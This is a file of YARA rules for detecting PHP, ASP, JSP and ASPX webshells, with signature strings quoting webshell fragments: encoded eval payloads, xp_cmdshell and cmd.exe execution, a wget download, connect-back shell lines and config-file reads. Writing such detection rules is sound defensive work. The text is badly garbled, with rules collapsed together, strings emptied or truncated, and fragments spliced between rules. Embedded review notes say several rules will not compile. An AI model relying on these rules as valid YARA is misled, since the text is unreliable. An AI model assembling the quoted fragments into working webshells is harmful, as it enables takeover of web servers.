strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii $s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii condition: filesize < 112KB and all of them } rule Php_Webshell_Webshell_zehir { strings: $s1 = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii $s2 = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii condition: filesize < 200KB and 1 of them } rule Php_Webshell_UploadShell_98038f1efa4203432349badabad76d44337319a6 { strings: $s2 = "$lol = file_get_contents(\"../../../../../wp-config.php\");" fullword ascii $s6 = "@unlink(\"./export-check-settings.php\");" fullword ascii $s7 = "$xos = \"Safe-mode:[Safe-mode:\".$hsafemode.\"] " fullword ascii condition: ( uint16(0) == 0x3f3c and filesize < 6KB and ( all of ($s*) ) ) or ( all of them ) } rule Php_Webshell_DKShell_f0772be3c95802a2d1e7a4a3f5a45dcdef6997f3 { strings: $s1 = "<?php Error_Reporting(0); $s_pass = \"" ascii $s2 = "$s_func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on" ascii condition: ( uint16(0) == 0x3c0a and filesize < 300KB and all of them ) } rule Php_Webshell_Unknown_8af033424f9590a15472a23cc3236e68070b952e { strings: $s1 = "$check = $_SERVER['DOCUMENT_ROOT']" fullword ascii $s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii $s3 = "fwrite($fp,base64_decode('" ascii condition: ( uint16(0) == 0x6324 and filesize < 6KB and ( all of ($s*) ) ) or ( all of them ) } rule Php_Webshell_DkShell_4000bd83451f0d8501a9dfad60dce39e55ae167d { strings: $x1 = "DK Shell - Took the Best made it Better..!!" 
fullword ascii $x2 = "preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x" ascii $x3 = "echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';" fullword ascii $s1 = "echo '<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';" fullword ascii $s9 = "$x = $_GET[\"x\"];" fullword ascii condition: ( uint16(0) == 0x3f3c and filesize < 200KB and 1 of ($x*) ) or ( 3 of them ) } rule Php_Webshell_WebShell_5786d7d9f4b0df731d79ed927fb5a124195fc901 { strings: $s1 = "preg_replace(\"\\x2F\\x2E\\x2A\\x2F\\x65\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x" ascii $s2 = "input[type=text], input[type=password]{" fullword ascii condition: ( uint16(0) == 0x6c3c and filesize < 80KB and all of them ) } rule Php_Webshell_webshell_e8eaf8da94012e866e51547cd63bb996379690bf { strings: $x1 = "@exec('./bypass/ln -s /etc/passwd 1.php');" fullword ascii $x2 = "echo \"<iframe src=mysqldumper/index.php width=100% height=100% frameborder=0></iframe> \";" fullword ascii $x3 = "@exec('tar -xvf mysqldumper.tar.gz');" fullword ascii condition: ( uint16(0) == 0x213c and filesize < 100KB and 1 of ($x*) ) or ( 2 of them ) } rule Php_Webshell_Unknown_0f06c5d1b32f4994c3b3abf8bb76d5468f105167 { strings: $s1 = "$check = $_SERVER['DOCUMENT_ROOT'] . 
\"/libraries/lola.php\" ;" fullword ascii $s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii $s3 = "fwrite($fp,base64_decode('" ascii condition: ( uint16(0) == 0x6324 and filesize < 2KB and all of them ) } rule Php_Webshell_WSOShell_0bbebaf46f87718caba581163d4beed56ddf73a7 { strings: $s8 = "$default_charset='Wi'.'ndo.'.'ws-12'.'51';" fullword ascii $s9 = "$mosimage_session = \"" fullword ascii condition: ( uint16(0) == 0x3f3c and filesize < 300KB and all of them ) } rule Php_Webshell_WebShell_Generic_1609_A { strings: $s1 = "return $qwery45234dws($b);" fullword ascii condition: ( uint16(0) == 0x3f3c and 1 of them ) } rule Php_Webshell_Nishang_Webshell { strings: $s1 = "psi.Arguments = \"-noninteractive \" + \"-executionpolicy bypass \" + arg;" ascii $s2 = "output.Text += \"\nPS> \" + console.Text + \"\n\" + do_ps(console.Text);" ascii $s3 = "<title>Antak Webshell" fullword ascii $s4 = "" $foot2 = "();}} @header(\"Status: 404 Not Found\"); ?>" condition: ( uint32(0) == 0x68703f3c and filesize < 80KB and ( 3 of them or $head1 at 0 or $head2 in (0..20) or 1 of ($x*) ) ) or $foot1 at (filesize-52) or $foot2 at (filesize-44) } rule Php_Webshell_ALFA_SHELL { strings: $x1 = "$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64')" ascii $x2 = "#solevisible@gmail.com" fullword ascii $x3 = "'login_page' => '500',//gui or 500 or 403 or 404" fullword ascii $x4 = "$GLOBALS['__ALFA__']" fullword ascii $x5 = "if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')" ascii $f1 = { 76 2F 38 76 2F 36 76 2F 2B 76 2F 2F 66 38 46 27 29 3B 3F 3E 0D 0A } condition: ( filesize < 900KB and 2 of ($x*) or $f1 at (filesize-22) ) } rule Php_Webshell_Webshell_FOPO_Obfuscation_APT_ON_Nov17_1 { strings: $x1 = "Obfuscation provided by FOPO" fullword ascii $s1 = "\";@eval($" ascii $f1 = { 22 29 29 3B 0D 0A 3F 3E } condition: uint16(0) == 0x3f3c and filesize < 800KB and ( $x1 or ( $s1 in (0..350) and $f1 at (filesize-23) ) ) } rule Jsp_Webshell_WebShell_JexBoss_JSP_1 { strings: 
$x1 = "equals(\"jexboss\")" $x2 = "%>
    <%if(request.getParameter(\"ppp\") != null &&" ascii
    	$s1 = "<%@ page import=\"java.util.*,java.io.*\"%>
    <% if (request.getParameter(\""
    	$s2 = "!= null && request.getHeader(\"user-agent\"" ascii
    	$s3 = "String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }}%>" fullword ascii
    	// NOTE(review): the rule header sits on the collapsed line above. In this copy
    	// $x2 and $s1 contain raw line breaks, which YARA does not accept inside a
    	// text string; the original text was evidently altered during extraction, so
    	// restore both from upstream before compiling.
    condition:
    	// "and" binds tighter than "or": the "<%" header check (0x253c little-endian
    	// == bytes "<%") and the 1 KB size gate apply only to the "1 of ($x*)"
    	// alternative, while "2 of them" fires on its own regardless of header or
    	// size. Presumably intentional upstream; if the gate is meant for both
    	// alternatives, parenthesize the trailing "or".
    	uint16(0) == 0x253c and filesize < 1KB and 1 of ($x*) or 2 of them
    }
    rule Php_Webshell_WebShell_JexBoss_WAR_1
    {
        // Small ZIP/WAR containers that carry the JexBoss JSP webshell file names.
        // The "jexwsN.jspPK" variants presumably match the entry name immediately
        // followed by the next ZIP signature as it is laid out inside the archive.
        // (The Php_ prefix is a naming inconsistency: the payload is a JSP in a WAR.)
        meta:
            description = "JexBoss WAR dropper: tiny ZIP archive with jbossass / jexws*.jsp entries"
        strings:
            $n_jbossass  = "jbossass" fullword ascii
            $n_jexws     = "jexws.jsp" fullword ascii
            $n_jexws_pk  = "jexws.jspPK" fullword ascii
            $n_jexws1    = "jexws1.jsp" fullword ascii
            $n_jexws1_pk = "jexws1.jspPK" fullword ascii
            $n_jexws2    = "jexws2.jsp" fullword ascii
            $n_jexws2_pk = "jexws2.jspPK" fullword ascii
            $n_jexws3    = "jexws3.jsp" fullword ascii
            $n_jexws3_pk = "jexws3.jspPK" fullword ascii
            $n_jexws4    = "jexws4.jsp" fullword ascii
            $n_jexws4_pk = "jexws4.jspPK" fullword ascii
        condition:
            // 0x4b50 little-endian == bytes "PK", the ZIP local-file-header magic.
            uint16(0) == 0x4b50
            and filesize < 4KB
            and any of ($n_*)
    }
    rule Asp_Webshell_webshell_tinyasp
    {
        // Minimal ASP one-liner: a file that opens with "<%" and, within its first
        // 150 bytes, contains "Execute Request" in any letter case, as ASCII or UTF-16.
        meta:
            description = "Tiny ASP webshell: 'Execute Request' in a <%-prefixed file under 150 bytes"
        strings:
            $exec = "Execute Request" nocase wide ascii
        condition:
            // 0x253c little-endian == bytes "<%", the ASP/JSP block opener.
            filesize < 150
            and uint16(0) == 0x253c
            and $exec
    }
    rule Asp_Webshell_WEBSHELL_ASPX_Mar21_1
    {
    // ASPX page that points a process's StartInfo.FileName at cmd.exe; the file
    // must begin with "<%", be under 6 KB, and contain all three fragments.
    strings:
    	$s1 = ".StartInfo.FileName = 'cmd.exe';" ascii fullword
    	// NOTE(review): $s2 is empty in this copy and $s3 looks truncated. YARA
    	// rejects an empty text string at compile time, so this rule will not load
    	// as-is; both fragments were presumably damaged during extraction and
    	// should be restored from the upstream rule before use.
    	$s2 = "" ascii fullword
    	$s3 = "test\";" ascii fullword
    condition:
    	// 0x253c little-endian == bytes "<%".
    	uint16(0) == 0x253c and filesize < 6KB and all of them
    }
    rule Php_Webshell_webshell_php_obfuscated_fopo
    {
    // Obfuscated PHP: a case-insensitive regex for an eval( / assert( call plus a
    // set of fixed fragments that presumably are base64 encodings of the same two
    // tokens at different byte alignments ($one* for eval, $two* for assert; the
    // longer "...AGUAdgBhAGwA..." forms look like the UTF-16 variants) — verify
    // against upstream before relying on that reading.
    strings:
    	$payload = /(\beval[\t ]*\([^)]|\bassert[\t ]*\([^)])/ nocase ascii
    	$one1 = "7QGV2YWwo" wide ascii
    	$one2 = "tAZXZhbC" wide ascii
    	$one3 = "O0BldmFsK" wide ascii
    	$one4 = "sAQABlAHYAYQBsACgA" wide ascii
    	$one5 = "7AEAAZQB2AGEAbAAoA" wide ascii
    	$one6 = "OwBAAGUAdgBhAGwAKA" wide ascii
    	$two1 = "7QGFzc2VydC" wide ascii
    	$two2 = "tAYXNzZXJ0K" wide ascii
    	$two3 = "O0Bhc3NlcnQo" wide ascii
    	$two4 = "sAQABhAHMAcwBlAHIAdAAoA" wide ascii
    	$two5 = "7AEAAYQBzAHMAZQByAHQAKA" wide ascii
    	$two6 = "OwBAAGEAcwBzAGUAcgB0ACgA" wide ascii
    	// NOTE(review): the remainder of this rule is damaged in this copy. The
    	// $php_short literal is unterminated, the "condition:" keyword and the
    	// tests on $payload/$one*/$two* are gone, and the surviving tail refers to
    	// #chr1..#chr3, which no visible string declares. It will not compile as-is;
    	// restore the strings section and condition from upstream.
    	$php_short = " 1 and ( #chr1 > 10 or #chr2 > 10 or #chr3 > 10 )
    }
    rule Php_Webshell_webshell_in_image
    {
    // Image/database files that also carry PHP: the leading magic of PNG
    // (89 50 4E 47), JPEG/JFIF (FF D8 FF E0), GIF ("GIF8" / "gif89") and a Jet/MDB
    // header prefix (00 01 00 00 "St"), to be combined with a PHP open tag.
    strings:
    	$png = { 89 50 4E 47 }
    	$jpg = { FF D8 FF E0 }
    	$gif = { 47 49 46 38 }
    	$gif2 = "gif89"
    	$mdb = { 00 01 00 00 53 74 }
    	// NOTE(review): from here on this copy is damaged. $php_short is empty
    	// (YARA refuses an empty text string), the original condition of the
    	// image-polyglot rule is gone, and the $s3..$s9 fragments (a JSP loop that
    	// reads 2048-byte blocks and prints "Hi,Man 2015", with raw line breaks
    	// inside the literals) plus the "7 of them" condition look spliced in from
    	// a different rule. It will not compile as-is; restore from upstream.
    	$php_short = "" fullword ascii
    	$s3 = "out.print(\"Hi,Man 2015
    \");" fullword ascii $s4 = "while((a=in.read(b))!=-1){" fullword ascii $s5 = "out.println(new String(b));" fullword ascii $s6 = "out.print(\"
    \");" fullword ascii $s7 = "out.print(\"
    \");" fullword ascii
    	$s8 = "int a = -1;" fullword ascii
    	$s9 = "byte[] b = new byte[2048];" fullword ascii
    condition:
    	filesize < 3KB and 7 of them
    }
    rule Php_Webshell_trigger_drop
    {
        // PHP page that issues DROP TRIGGER through mssql_query and carries a
        // 'returnto' GET parameter pointing at database_properties.php. All four
        // fragments must be present in a file under 5 KB.
        meta:
            description = "PHP page running DROP TRIGGER via @mssql_query with a returnto parameter"
        strings:
            $drop      = "@mssql_query('DROP TRIGGER" ascii
            $ret_check = "if(empty($_GET['returnto']))" fullword ascii
            $ret_set   = "$_GET['returnto'] = 'database_properties.php';" fullword ascii
            // NOTE(review): this fragment is unusually short in this copy and may have
            // lost its tail during extraction — compare against the upstream rule.
            $echo      = "echo(''" ascii
        condition:
            filesize < 5KB and all of them
    }
    rule Php_Webshell_InjectionParameters
    {
        // Despite the Php_ prefix the fragments are VB.NET: a public class named
        // InjectionParameters with a shared read-only Empty instance. Both lines
        // must appear in a file under 13 KB.
        meta:
            description = "VB.NET InjectionParameters class (Public Class + Shared ReadOnly Empty)"
        strings:
            $cls   = "Public Class InjectionParameters" fullword ascii
            $empty = "Public Shared ReadOnly Empty As New InjectionParameters(-1, \"\")" fullword ascii
        condition:
            filesize < 13KB and all of them
    }
    rule Php_Webshell_users_list
    {
        // Database user-management page: a "Create User" control, a " Default DB "
        // column label and a PHP $skiplist seeded with what look like built-in
        // SQL Server principals. All three fragments are required, file under 12 KB.
        meta:
            description = "PHP user listing page: Create User / Default DB / $skiplist of server principals"
        strings:
            $create    = "Create User" fullword ascii
            $defaultdb = " Default DB " fullword ascii
            $skiplist  = "$skiplist = array('##MS_AgentSigningCertificate##','NT AUTHORITY\\NETWORK SERVIC" ascii
        condition:
            filesize < 12KB and all of them
    }
    rule Php_Webshell_trigger_modify
    {
    strings:
    	$s1 = "
    \" + SHELL_DIR" fullword ascii $s5 = ": \"c:\\\\windows\\\\system32\\\\cmd.exe\")" fullword ascii condition: filesize < 715KB and all of them } rule Php_Webshell_reDuhServers_reDuh_2 { strings: $s1 = "errorlog(\"FRONTEND: send_command '\".$data.\"' on port \".$port.\" returned \"." ascii $s2 = "$msg = \"newData:\".$socketNumber.\":\".$targetHost.\":\".$targetPort.\":\".$seq" ascii $s3 = "errorlog(\"BACKEND: *** Socket key is \".$sockkey);" fullword ascii condition: filesize < 57KB and all of them } rule Php_Webshell_Customize_2 { strings: $s1 = "while((l=br.readLine())!=null){sb.append(l+\"\\r\\n\");}}" fullword ascii $s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii condition: filesize < 30KB and all of them } rule Php_Webshell_ChinaChopper_one { strings: $s0 = "<%eval request(" fullword ascii condition: filesize < 50 and all of them } rule Php_Webshell_CN_Tools_old { strings: $s0 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii $s1 = "$sURL = \"http://\".$sServer.\"/\".$sFile;" fullword ascii $s2 = "chmod(\"/\".substr($sHash, 0, 2), 0777);" fullword ascii $s3 = "$sCmd = \"echo 123> \".$sFileOut;" fullword ascii condition: filesize < 6KB and all of them } rule Php_Webshell_item_301 { strings: $s1 = "$sURL = \"301:http://\".$sServer.\"/index.asp\";" fullword ascii $s2 = "(gov)\\\\.(cn)$/i\", $aURL[\"host\"])" ascii $s3 = "$aArg = explode(\" \", $sContent, 5);" fullword ascii $s4 = "$sURL = $aArg[0];" fullword ascii condition: filesize < 3KB and 3 of them } rule Php_Webshell_CN_Tools_item { strings: $s1 = "$sURL = \"http://\".$sServer.\"/\".$sWget;" fullword ascii $s2 = "$sURL = \"301:http://\".$sServer.\"/\".$sWget;" fullword ascii $s3 = "$sWget=\"index.asp\";" fullword ascii $s4 = "$aURL += array(\"scheme\" => \"\", \"host\" => \"\", \"path\" => \"\");" fullword ascii condition: filesize < 4KB and all of them } rule Php_Webshell_f3_diy { strings: $s0 = "<%@LANGUAGE=\"VBScript.Encode\" 
CODEPAGE=\"936\"%>" fullword ascii $s5 = ".black {" fullword ascii condition: uint16(0) == 0x253c and filesize < 10KB and all of them } rule Php_Webshell_ChinaChopper_temp { strings: $s0 = "o.run \"ff\",Server,Response,Request,Application,Session,Error" fullword ascii $s1 = "Set o = Server.CreateObject(\"ScriptControl\")" fullword ascii $s2 = "o.language = \"vbscript\"" fullword ascii $s3 = "o.addcode(Request(\"SC\"))" fullword ascii condition: filesize < 1KB and all of them } rule Php_Webshell_Tools_2015 { strings: $s0 = "Configbis = new BufferedInputStream(httpUrl.getInputStream());" fullword ascii $s4 = "System.out.println(Oute.toString());" fullword ascii $s5 = "String ConfigFile = Outpath + \"/\" + request.getParameter(\"ConFile\");" fullword ascii $s8 = "HttpURLConnection httpUrl = null;" fullword ascii $s19 = "Configbos = new BufferedOutputStream(new FileOutputStream(Outf));;" fullword ascii condition: filesize < 7KB and all of them } rule Php_Webshell_ChinaChopper_temp_2 { strings: $s0 = "@eval($_POST[strtoupper(md5(gmdate(" ascii condition: filesize < 150 and all of them } rule Php_Webshell_templatr { strings: $s0 = "eval(gzinflate(base64_decode('" ascii condition: filesize < 70KB and all of them } rule Php_Webshell_reDuhServers_reDuh_3 { strings: $s1 = "Response.Write(\"[Error]Unable to connect to reDuh.jsp main process on port \" +" ascii $s2 = "host = System.Net.Dns.Resolve(\"127.0.0.1\");" fullword ascii $s3 = "rw.WriteLine(\"[newData]\" + targetHost + \":\" + targetPort + \":\" + socketNum" ascii $s4 = "Response.Write(\"Error: Bad port or host or socketnumber for creating new socket" ascii condition: filesize < 40KB and all of them } rule Php_Webshell_ChinaChopper_temp_3 { strings: $s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"" ascii $s1 = "\"],\"unsafe\");%>" ascii condition: uint16(0) == 0x253c and filesize < 150 and all of them } rule Asp_Webshell_Shell_Asp { strings: $s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword 
ascii $s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii $s3 = "function Command(cmd, str){" fullword ascii condition: filesize < 100KB and all of them } rule Asp_Webshell_Txt_aspxtag { strings: $s1 = "String wGetUrl=Request.QueryString[" fullword ascii $s2 = "sw.Write(wget);" fullword ascii $s3 = "Response.Write(\"Hi,Man 2015\"); " fullword ascii condition: filesize < 2KB and all of them } rule Php_Webshell_Txt_php { strings: $s1 = "$Config=$_SERVER['QUERY_STRING'];" fullword ascii $s2 = "gzuncompress($_SESSION['api']),null);" ascii $s3 = "sprintf('%s?%s',pack(\"H*\"," ascii $s4 = "if(empty($_SESSION['api']))" fullword ascii condition: filesize < 1KB and all of them } rule Asp_Webshell_Txt_aspx1 { strings: $s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[" $s1 = "],\"unsafe\");%>" fullword ascii condition: filesize < 150 and all of them } rule Php_Webshell_Txt_shell { strings: $s1 = "printf(\"Could not connect to remote shell!\\n\");" fullword ascii $s2 = "printf(\"Usage: %s \\n\", prog);" fullword ascii $s3 = "execl(shell,\"/bin/sh\",(char *)0);" fullword ascii $s4 = "char shell[]=\"/bin/sh\";" fullword ascii $s5 = "connect back door\\n\\n\");" fullword ascii condition: filesize < 2KB and 2 of them } rule Asp_Webshell_Txt_asp { strings: $s1 = "Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next:BodyCol" ascii $s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii condition: uint16(0) == 0x253c and filesize < 100KB and all of them } rule Asp_Webshell_Txt_asp1 { strings: $s1 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii $s2 = "autoLoginEnable=WSHShell.RegRead(autoLoginPath & autoLoginEnableKey)" fullword ascii $s3 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii $s4 = "szTempFile = server.mappath(\"cmd.txt\")" fullword ascii condition: filesize < 70KB and 2 of them } rule Php_Webshell_Txt_php_2 { strings: $s1 = "function connect($dbhost, $dbuser, $dbpass, $dbname='') {" fullword ascii 
$s2 = "scookie('loginpass', '', -86400 * 365);" fullword ascii $s3 = "<?php echo $act.' - '.$_SERVER['HTTP_HOST'];?>" fullword ascii $s4 = "Powered by \" + SHELL_DIR" fullword ascii $s2 = "Process pro = Runtime.getRuntime().exec(exe);" fullword ascii $s3 = "\"" fullword ascii $s4 = "cmd = \"cmd.exe /c set\";" fullword ascii condition: filesize < 715KB and 2 of them } rule Asp_Webshell_Txt_aspxlcx { strings: $s1 = "public string remoteip = " ascii $s2 = "=Dns.Resolve(host);" ascii $s3 = "public string remoteport = " ascii $s4 = "public class PortForward" ascii condition: uint16(0) == 0x253c and filesize < 18KB and all of them } rule Php_Webshell_Txt_xiao { strings: $s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii $s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii $s3 = "conn.Execute(\"Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED," ascii $s4 = "function Command(cmd, str){" fullword ascii $s5 = "echo \"if(obj.value=='PageWebProxy')obj.form.target='_blank';\"" fullword ascii condition: filesize < 100KB and all of them } rule Asp_Webshell_Txt_aspx { strings: $s1 = "SQLExec : CmdShell  :  8617.tmp\"&chr(34)" fullword ascii $s2 = "strQuery=\"dbcc addextendedproc ('xp_regwrite','xpstar.dll')\"" fullword ascii $s3 = "strQuery = \"exec master.dbo.xp_cmdshell '\" & request.form(\"cmd\") & \"'\" " fullword ascii $s4 = "session(\"login\")=\"\"" fullword ascii condition: filesize < 15KB and all of them } rule Php_Webshell_Txt_hello { strings: $s0 = "Dim myProcessStartInfo As New ProcessStartInfo(\"cmd.exe\")" fullword ascii $s1 = "myProcessStartInfo.Arguments=\"/c \" & Cmd.text" fullword ascii $s2 = "myProcess.Start()" fullword ascii $s3 = "

    " fullword ascii condition: filesize < 25KB and all of them } rule Php_Webshell_webshell_php_obfuscated_encoding { strings: $enc_eval1 = /(e|\\x65|\\101)(\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ ascii nocase $enc_eval2 = /(\\x65|\\101)(v|\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ ascii nocase $enc_assert1 = /(a|\\97|\\x61)(\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ ascii nocase $enc_assert2 = /(\\97|\\x61)(s|\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ ascii nocase $php_short = "assert(strpos($styles, $" $gfp3 = "$module = new $_GET['module']($_GET['scope']);" $gfp4 = "$plugin->$_POST['action']($_POST['id']);" $gfp5 = "$_POST[partition_by]($_POST[" $gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);" $gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... ;) $gfp8 = "Smarty_Internal_Debug::start_render($_template);" $gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php" $gfp10 = "[][}{;|]\\|\\\\[+=]\\|?" $gfp11 = "(eval (getenv \"EPROLOG\")))" $gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ" $gfp_3 = " GET /" $gfp_4 = " POST /" condition: filesize < 300KB and not ( any of ( $gfp* ) ) and $geval } rule Php_Webshell_webshell_php_generic_backticks { strings: $backtick = /`[\t ]*\$(_POST\[|_GET\[|_REQUEST\[|_SERVER\['HTTP_)/ ascii $php_short = "My PHP Shell assert(strpos($styles, $" $gfp3 = "$module = new $_GET['module']($_GET['scope']);" $gfp4 = "$plugin->$_POST['action']($_POST['id']);" $gfp5 = "$_POST[partition_by]($_POST[" $gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);" $gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... 
;) $gfp8 = "Smarty_Internal_Debug::start_render($_template);" $gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php" $gfp10 = "[][}{;|]\\|\\\\[+=]\\|?" $gfp11 = "(eval (getenv \"EPROLOG\")))" $gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ" condition: filesize < 500KB and not ( any of ( $gfp* ) ) and any of ( $sr* ) } rule Php_Webshell_webshell_php_obfuscated_encoding_mixed_dec_and_hex { strings: $mix = /['"](\w|\\x?[0-9a-f]{2,3})[\\x0-9a-f]{2,20}\\\d{1,3}[\\x0-9a-f]{2,20}\\x[0-9a-f]{2}\\/ ascii nocase $php_short = "1" $x2 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(" $s1 = "XsltSettings.TrustedXslt" $s2 = "Xml.XmlUrlResolver" $s3 = "FromBase64String(Request[\"" condition: filesize < 500KB and $csharpshell and (1 of ($x*) or all of ($s*)) } rule Php_Webshell_CN_Honker_Webshell_PHP_php5 { strings: $s0 = "else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user" ascii /* PEStudio Blacklist: strings */ $s20 = "echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump').\"\".$" ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x3f3c and filesize < 300KB and all of them } rule Php_Webshell_CN_Honker_Webshell_test3693 { strings: $s0 = "Process p=Runtime.getRuntime().exec(\"cmd /c \"+strCmd);" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "http://www.topronet.com \",\" Thanks for your support - " ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x4b50 and filesize < 50KB and all of them } rule Php_Webshell_CN_Honker_Webshell_mycode12 { strings: $s1 = "" fullword ascii condition: uint16(0) == 0x433c and filesize < 13KB and all of them } rule Php_Webshell_CN_Honker_Webshell_PHP_linux { strings: $s0 = "" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "Changing CHMOD Permissions Exploit " fullword ascii condition: uint16(0) == 0x696c and filesize < 6KB and all of them } rule 
Php_Webshell_CN_Honker_Webshell_Interception3389_get { strings: $s0 = "userip = Request.ServerVariables(\"HTTP_X_FORWARDED_FOR\")" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "file.writeline szTime + \" HostName:\" + szhostname + \" IP:\" + userip+\":\"+n" ascii /* PEStudio Blacklist: strings */ $s3 = "set file=fs.OpenTextFile(server.MapPath(\"WinlogonHack.txt\"),8,True)" fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 3KB and all of them } rule Php_Webshell_CN_Honker_Webshell_nc_1 { strings: $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 " ascii /* PEStudio Blacklist: agent */ $s2 = "<%if session(\"pw\")<>\"go\" then %>" fullword ascii condition: filesize < 11KB and all of them } rule Php_Webshell_CN_Honker_Webshell_PHP_BlackSky { strings: $s0 = "eval(gzinflate(base64_decode('" ascii /* PEStudio Blacklist: strings */ $s1 = "B1ac7Sky-->" fullword ascii condition: filesize < 641KB and all of them } rule Asp_Webshell_CN_Honker_Webshell_ASP_asp3 { strings: $s1 = "if shellpath=\"\" then shellpath = \"cmd.exe\"" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "c.open \"GET\", \"http://127.0.0.1:\" & port & \"/M_Schumacher/upadmin/s3\", Tru" ascii /* PEStudio Blacklist: strings */ condition: filesize < 444KB and all of them } rule Asp_Webshell_CN_Honker_Webshell_ASPX_sniff { strings: $s1 = "IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "if (!logIt && my_s_smtp && (dport == 25 || sport == 25))" fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 91KB and all of them } rule Php_Webshell_CN_Honker_Webshell_udf_udf { strings: $s1 = "<?php // Source My : Meiam " fullword ascii /* PEStudio Blacklist: strings */ $s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii /* PEStudio Blacklist: strings */ condition: filesize < 430KB and all of them } rule Jsp_Webshell_CN_Honker_Webshell_JSP_jsp { strings: $s1 = 
"<input name=f size=30 value=shell.jsp>" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "<font color=red>www.i0day.com By:" fullword ascii condition: filesize < 3KB and all of them } rule Php_Webshell_CN_Honker_Webshell_T00ls_Lpk_Sethc_v4_mail { strings: $s1 = "if (!$this->smtp_putcmd(\"AUTH LOGIN\", base64_encode($this->user)))" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "$this->smtp_debug(\"> \".$cmd.\"\\n\");" fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 39KB and all of them } rule Php_Webshell_CN_Honker_Webshell_phpwebbackup { strings: $s0 = "<?php // Code By isosky www.nbst.org" fullword ascii $s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x3f3c and filesize < 67KB and all of them } rule Php_Webshell_CN_Honker_Webshell_dz_phpcms_phpbb { strings: $s1 = "if($pwd == md5(md5($password).$salt))" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "function test_1($password)" fullword ascii /* PEStudio Blacklist: strings */ $s3 = ":\".$pwd.\"\\n---------------------------------\\n\";exit;" fullword ascii $s4 = ":user=\".$user.\"\\n\";echo \"pwd=\".$pwd.\"\\n\";echo \"salt=\".$salt.\"\\n\";" fullword ascii condition: filesize < 22KB and all of them } rule Php_Webshell_CN_Honker_Webshell_picloaked_1 { strings: $s0 = "<?php eval($_POST[" ascii /* PEStudio Blacklist: strings */ $s1 = ";<%execute(request(" ascii /* PEStudio Blacklist: strings */ $s3 = "GIF89a" fullword ascii /* Goodware String - occured 318 times */ condition: filesize < 6KB and 2 of them } rule 